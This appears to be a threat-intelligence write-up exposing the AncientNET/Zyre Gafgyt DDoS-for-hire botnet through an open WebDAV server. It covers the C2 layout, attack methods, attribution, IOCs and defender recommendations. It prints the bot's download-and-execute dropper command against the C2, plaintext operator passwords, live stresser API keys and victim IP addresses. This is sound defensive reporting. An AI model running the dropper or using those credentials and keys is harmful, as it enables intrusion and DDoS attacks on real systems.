AncientNET / Zyre — Total Botnet Unmasking via an Open WebDAV
How a single open port turned a Gafgyt DDoS-as-a-Service operation inside out
AncientNET / Zyre — Total Botnet Unmasking via an Open WebDAV
TL;DR: A Vietnam-hosted Gafgyt-based DDoS-as-a-Service operation called AncientNET (bot family: Zyre / zyreBot) left an unauthenticated WebDAV server on port 4949 that exposes its entire C2 source code, operator credentials, SSH host keys, and live bot manifest. At time of writing the infrastructure is still fully online, the attack counter has incremented to 1,029 attacks against 252 active bots (up from 171 at investigation time — the operator is mass-onboarding bots right now), and the actor zyreeeee3 / BaconXD is identifiable down to a mail.ru address and Telegram channel. This is one of the cleanest DaaS operator unmaskings we've documented. Full IOCs at the bottom.
How we found it
A SecuriteInfoCom-tagged ARM ELF dropper was uploaded to VirusTotal on 2026-04-06 22:50:31 UTC (b7fb5a5d78431abfee0b69d44a8c0181df8dd588bca93694890aa8b0a3c75ab7). It was tagged Gafgyt by 18/76 engines but otherwise looked like routine IoT botnet noise. Three hours later GHOST flagged it for live infrastructure dumping. Within the same window we had the entire backend.
The tip is fresh — less than 24 hours old at the time of publication. The actor has not yet noticed.
The OPSEC failure
The C2 at 103.130.214.71 (BKHOST-VN, Hanoi, AS135953) runs six listening services:
| Port | Service | Purpose |
|---|---|---|
| 22 | OpenSSH 9.6p1 | System SSH |
| 1212 | HTTP | Payload distribution (zyre.<arch> binaries) |
| 1313 | HTTP | API endpoint |
| 2222 | libssh 0.10.6 | AncientNET operator panel |
| 4949 | WebDAV (HTTP) | Unauthenticated file server — directory listing on |
| 12345 | TCP | Bot listener |
Port 4949 returns a directory listing on GET / and serves every file inside the operator's working tree:
/
├── srv.c ← 233KB FULL C2 source (libssh + civetweb + json-c)
├── srv ← Compiled C2 binary (185 KB)
├── builder.sh ← 70KB cross-compile setup
├── build.sh ← Multi-arch build script
├── clients_cache.json ← LIVE BOT MANIFEST (175 entries with ASN/geo)
├── ssh_host_key{,_ecdsa} ← Server SSH PRIVATE KEYS
├── bot/ ← Bot client source
├── bins/, binss/ ← Compiled payloads (15 architectures)
├── database/
│ ├── creds.json ← 7 operator accounts in PLAINTEXT
│ ├── totalattacks.json ← Live attack counter
│ ├── config.json ← Slot allocation
│ ├── basic.json ← Stresser API integration (with API keys)
│ ├── rawmethods.json ← 16+ DDoS method definitions
│ └── spoofmethods.json ← IP-spoofed attack definitions
├── designs/ ← Terminal UI templates (.tfx)
├── funnel/ ← funnel attack module source
└── get files/ ← All DDoS tool source code (~20 files)
This is not a leak, a backup, or a snapshot. It is the operator's live working directory served over the public internet. Files modified during the investigation included clients_cache.json (auto-updated as bots checked in) and totalattacks.json (incrementing as attacks ran).
What we pulled
The C2 source code (srv.c, 238 KB)
Compiled with:
gcc -o srv srv.c -ljson-c -lcurl -lpthread -lcivetweb -lssh -lm
The server, branded "AncientNET" in its banner, runs an SSH-based operator panel via libssh on port 2222 (not OpenSSH — a custom service binding libssh directly), supports up to 100 concurrent operators and 1,000,000 bot connections, distributes payloads via an embedded civetweb HTTP server, and logs every attack to a hardcoded Discord webhook (Captain Hook, webhook ID 1482807215965339710). Attack slots are tiered: raw (1), funnel (3), mirai (4), spoof (1), with role-based access control across admin / vip / star / basic / mirai / raw / spoof.
C2 IP resolution is intentionally indirect: bots fetch the current operator IP from pastebin.com/raw/ifEadAbv (which still resolves to 103.130.214.71 as of right now). This is a textbook dead drop resolver — and it's tied to a single, identifiable Pastebin account.
The 7 operator accounts (creds.json)
Plaintext, exactly as the C2 reads them:
| Username | Password | Admin | Notes |
|---|---|---|---|
admin | pwlaa1 | yes | All methods, 100 concurrent, 86,400s max attack |
satyam | satyam006 | yes | vip / basic / star |
enes | enesporn | yes | mirai (Turkish handle) |
allah | Mina@2580 | no | mirai |
symon | 4878398 | no | vip / basic / star |
Keawee | keaweee | no | vip / basic / star |
parker | parker1337 | no | vip / basic / star |
Every one of these is a credential pair you can pivot on across other DDoS forums and stresser sites.
The live bot manifest (clients_cache.json — 175 bots as of now)
171 active when we first pulled it; 175 by midday Apr 7. The manifest is enriched with ASN, organization, and geo per bot. Top hosting providers compromised:
| Provider | Bot count |
|---|---|
| Hetzner Online GmbH | 24 |
| OVH SAS | 19 |
| Cloudflare, Inc. | 18 |
| Hetzner (other) | 10 |
| OVH GmbH | 7 |
| Oracle Corporation | 6 |
| Coritan LLC | 5 |
Geographic concentration is 44+ Germany (Saxony 30, Hesse 14), 21 Canada, 16 Netherlands, 14 Australia, 9 UK, 7 France, 6 Turkey. Pretty much exclusively VPS/cloud — almost no consumer IoT — which suggests the actor is brute-forcing exposed SSH on small VPS providers rather than running a Mirai-style telnet sweep.
Notable compromised endpoints flagged for notification:
| IP | Organization |
|---|---|
130.184.31.41 | University of Arkansas |
192.170.231.151 | University of Chicago |
155.133.246.50, 162.254.197.52, 185.25.182.50 | Valve Corporation (3 game-server IPs) |
20.195.24.81 | Microsoft Azure |
35.200.194.163 | Google Cloud |
145.40.87.131 | Equinix |
15 fresh payload variants
The binss/ directory holds 15 architecture-specific Zyre binaries — arm4 / arm5 / arm6 / arm7 / mips / mpsl / sh4 / spc / x86 / x64 / i486 / i686 / m68k / apk / dbg. We pulled eight ELF variants. All eight have zero VirusTotal detections. They were rebuilt the morning of the investigation.
The dropper logic is classic Gafgyt-derivative:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
(wget http://<C2>:1212/<payload> -O <name> ||
curl http://<C2>:1212/<payload> -o <name> ||
busybox wget http://<C2>:1212/<payload> -O <name>) >/dev/null 2>&1;
chmod +x <name>; ./<name> >/dev/null 2>&1 & rm -rf <name>
A single-instance lock on TCP/58210 is the cleanest hunting signature — anything binding that port on a Linux box is almost certainly Zyre.
The bot also actively kills competing botnet processes: mirai. sora. bot. dark. hilix. rakitin. neon. owari. aqua. boatnet. mozi. — the standard "this device is mine" routine.
Attack methods
Three method classes are implemented:
Raw methods (local binaries): UDP flood (udpc), high-PPS UDP, Minecraft join flood (mcfucker), Roblox flood, generic TCP, OVH-bypass UDP, HTTP/HTTPS L7 flood (15K req batches), proxied L7, SYN, SYN-ACK, ACK, RST, TCP handshake flood, connection flood, Source Engine query flood (valve).
Spoofed methods (IP spoofing): sudp, ssyn, shand, sock.
API-based methods (relayed through commercial stressers): dns-star, tcp-star, ovh-star, http-star, socket, fivem, mc-socket, ssh, syn, tcpbypass — all routed through goofystress.st and webdown.su, with API keys hardcoded in database/basic.json:
goofystress.st: 9216f57fd2c15d2a4aa3cc2818d5d100946f68e727a5a5ab9ef6cdf72b3a8fc5
webdown.su: 02a163f83f9d3c52d51e56f90155472f54d17ace32632b7df596f1bf60e8df89
Both API keys are live abuse-report ammunition that the upstream stresser operators can use to identify and revoke this customer.
DDoS targets visible in the manifest
Several entries in clients_cache.json are clearly attack targets, not bots — they're URLs not IPs, and their categories include competing booters:
botrix.live,rivax.pro— competing stresser servicesdstat.femboybreeding.xyz— DDoS attack stats trackerkick.com— streaming platformgetir.com— Turkish delivery appinstagram.com— Metaequalpride.com,lgbt.foundation— LGBTQ+ media organizations
The presence of LGBTQ+ orgs in the target list is the most concerning data point — this is targeted, not opportunistic.
Attribution
The exposed file system gives a near-complete identity chain on the primary operator:
| Handle | Platform | Evidence |
|---|---|---|
zyreeeee3 | Pastebin | 9 public pastes since Sept 2025, hosts the C2 IP dead drop |
BaconXD | Portmap.io | Secondary fallback C2 (BaconXD-57868.portmap.host:57868) |
hedevis2000@mail.ru | mail.ru | WHOIS registrant for webdown.su (one of the integrated stressers) |
ancientdownerr | Telegram | "Ancient Downer" channel, 24 members |
Discord guild 1472532211604521020 | Discord | Attack-log webhook destination |
The C2 host's SSH key carries the hostname root@1031302147115430497564 — that's an Oracle Cloud instance ID format, suggesting the actor either previously hosted on Oracle Cloud and migrated, or is using the BKHOST-VN box as a proxy in front of an Oracle origin.
A Pastebin paste tied to zyreeeee3 (/raw/30gV2uWt, dated 2026-01-29) lists three crypto wallets that are presumably tied to monetization:
ETH: 0xF04A19799E514aa654b26a0f73427Ce1d6768904
BTC: bc1qdqhnyjx0tcamk7mh0hwaf4xt48e59m2lerlm6c
TRON: TJNeEfK1DbUMyMThJye74bWKVt9bymXzQH
Live status as of publication
We rechecked the infrastructure immediately before publishing:
- All six C2 ports: still open
- Port 4949 WebDAV: still HTTP 200, still serving the entire working directory
- Pastebin dead drop: still resolves to
103.130.214.71 - Total attacks counter: 1,029 (was 1,018 at investigation time — 11 new attacks since)
- Active bots: 252 (was 171 at investigation time — net growth of 81 bots in less than 12 hours, with the bulk of growth in the final hour)
creds.json: rewritten 11:10 UTC — operator was logged into their own panel mid-daybuilder.shandsrv.c: modified the morning of Apr 7 — actor is actively iterating
Translation: the operator does not know they have been observed and the investigation captured the operation mid-stride.
Why this matters
DDoS-as-a-Service operations are usually only partially mappable. You get the C2 IP, maybe a Telegram channel, sometimes a customer count from a Discord scrape. AncientNET is the rare case where a single OPSEC mistake — a directory listing left on — collapses the entire operation into a flat file pull. We have:
- The complete C2 source code (compilable)
- The credential database (plaintext, 7 operators)
- The SSH host private keys
- The current bot manifest with ASN-level enrichment
- The current attack-count counter
- The hardcoded stresser API keys (immediate revocation lever)
- The Pastebin / Telegram / Discord / mail.ru identity chain
- 8 fresh payload binaries with zero AV detection at publication
The defensive opportunities are immediate.
Recommendations
For network defenders:
- Block
103.130.214.71at the perimeter, all ports. - Block
pastebin.com/raw/ifEadAbv,pastebin.com/raw/7vXQjepv(and the rest of the Pastebin URLs in the IOC table) at the proxy layer. - Hunt for processes binding
TCP/58210on Linux — that's the Zyre single-instance lock and is unique enough to fire on its own. - Hunt for processes named
zyre,zyre2,zyreBotin/proc. - Block outbound to
goofystress.standwebdown.su. - Sweep Linux VPS fleets for exposed/weak SSH — the bot population is overwhelmingly small VPS, not consumer IoT, so SSH brute force is the likely entry vector.
For platform abuse teams:
- Pastebin: kill account
zyreeeee3and remove the listed pastes (they are the C2 dead drop for an active botnet) - Telegram: report
t.me/ancientdownerr - Discord: report guild
1472532211604521020and webhook1482807215965339710 - BKHOST-VN (
hopqd@bkhost.vn,thanhtd@bkhost.vn): host103.130.214.71is an active C2 with exposed loot goofystress.standwebdown.su: revoke the listed API keys (they are funding a downstream operator who is reselling your service)- mail.ru abuse:
hedevis2000@mail.ruis the WHOIS registrant for an active DaaS panel
For affected organizations (notification in progress):
- University of Arkansas IT Security (
130.184.31.41) - University of Chicago IT Security (
192.170.231.151) - Valve Security (3 IPs)
- equalpride.com / lgbt.foundation (your sites are on a target list)
IOCs
Primary C2
| Indicator | Type | Notes |
|---|---|---|
103.130.214.71 | IPv4 | C2 (BKHOST-VN, AS135953, Hanoi) |
103.130.214.71:12345 | TCP | Bot listener |
103.130.214.71:1212 | HTTP | Payload distribution |
103.130.214.71:2222 | TCP/libssh | Operator panel ("AncientNET") |
103.130.214.71:4949 | HTTP | Open WebDAV — complete directory listing |
103.130.214.71:1313 | HTTP | API endpoint |
BaconXD-57868.portmap.host:57868 | Domain | Portmap.io fallback C2 |
pastebin.com/raw/ifEadAbv | URL | C2 IP dead drop |
pastebin.com/raw/7vXQjepv | URL | DDoS tool file list |
pastebin.com/raw/xcrcEZq0 | URL | Java dropper source |
pastebin.com/raw/euQsFVdL | URL | Proxy list |
pastebin.com/raw/YBNKv3rM | URL | Go HTTP flooder |
pastebin.com/raw/30gV2uWt | URL | Crypto wallet addresses |
pastebin.com/raw/vsK91Srx | URL | Portmap fallback |
Stresser API infrastructure
| Domain | IP | Notes |
|---|---|---|
goofystress.st | 104.26.13.141 (Cloudflare) | Created 2025-11-04 |
webdown.su | 185.178.208.166 (DDoS-Guard) | Registrant hedevis2000@mail.ru |
mirailovers.io | 104.21.81.246 (Cloudflare) | Cross-compiler host (Njalla privacy reg) |
Compromised stresser API keys
goofystress.st: 9216f57fd2c15d2a4aa3cc2818d5d100946f68e727a5a5ab9ef6cdf72b3a8fc5
webdown.su: 02a163f83f9d3c52d51e56f90155472f54d17ace32632b7df596f1bf60e8df89
File hashes — the original SecuriteInfoCom sample
| Algorithm | Hash |
|---|---|
| SHA256 | b7fb5a5d78431abfee0b69d44a8c0181df8dd588bca93694890aa8b0a3c75ab7 |
| SHA1 | ff446a26be1cbc1857b98024aa845b79d0464acc |
| MD5 | 8aadeaf8a3d4b3b21638b3dc511a078b |
File hashes — fresh payloads pulled from the C2 (0/76 VT at publication)
| File | SHA256 |
|---|---|
zyre.arm4 | 802f78bcafbaccc3a920f2b4b2fed0f83c4023f0d2de0dc4cb53664101a53d05 |
zyre.arm5 | db7a5fabfbcd71a90fe9df11e59c7c0bca398947fe5147790f08eaec425d5126 |
zyre.arm6 | 1fcd2ba33df1f7d312877ccc38b3874e5b0af1a04531b73bc8657cfa85c0a4a2 |
zyre.arm7 | 4d69b085e44791e13d7955ffdb1b16155041a919a6151ec521a6cf5fd7ecb5a7 |
zyre.mips | b80f13e4dacd3ccc0f1a09b6d50699e9e1dcd69fca7205c09072d9b89e10009a |
zyre.x86 | a206c528aa82627c1b19646cf368619ad8d550b712cb2e2fe005883ca6761d8b |
zyre.sh4 | 86187dbf150d19fa3860c32744637283b1a308ace35d1e6e09495a3b981cfae4 |
zyre.spc | 65412fae549a84301426b245ee48fe8e6a1a7c19d5f103375d5a9d668b51ab4c |
Hunting
- TCP/58210 bind on Linux (Zyre single-instance lock)
- Process names:
zyre,zyre2,zyreBot - File paths:
/tmp/zyre.*,/var/run/zyre.*,/mnt/zyre.*,/root/zyre.* - Outbound to
103.130.214.71on any port - DNS to
goofystress.st,webdown.su,mirailovers.io
Crypto wallets
ETH: 0xF04A19799E514aa654b26a0f73427Ce1d6768904
BTC: bc1qdqhnyjx0tcamk7mh0hwaf4xt48e59m2lerlm6c
TRON: TJNeEfK1DbUMyMThJye74bWKVt9bymXzQH
Investigation conducted 2026-04-07 by Breakglass Intelligence / GHOST. Original sample reported by SecuriteInfoCom on VirusTotal 2026-04-06 22:50 UTC. Infrastructure liveness reverified immediately before publication.